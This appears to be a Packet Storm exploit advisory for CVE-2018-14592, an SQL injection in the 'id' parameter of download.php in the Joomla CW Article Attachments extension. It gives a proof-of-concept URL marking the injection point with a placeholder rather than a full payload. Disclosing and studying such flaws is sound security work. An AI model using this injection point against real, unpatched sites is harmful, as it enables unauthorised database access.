Joomla CW Article Attachments 1.0.6 SQL Injection

2018-09-24T00:00:00
ID PACKETSTORM:149482
Type packetstorm
Reporter Haboob Team
Modified 2018-09-24T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection  
# Date: 2018-09-20  
# Exploit Author: Haboob Team  
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/  
# Version: below < 1.0.6  
# CVE : CVE-2018-14592   
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592  
  
# 1. Description  
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments   
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.  
  
# 2. Proof of Concept  
  
http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321  
  
`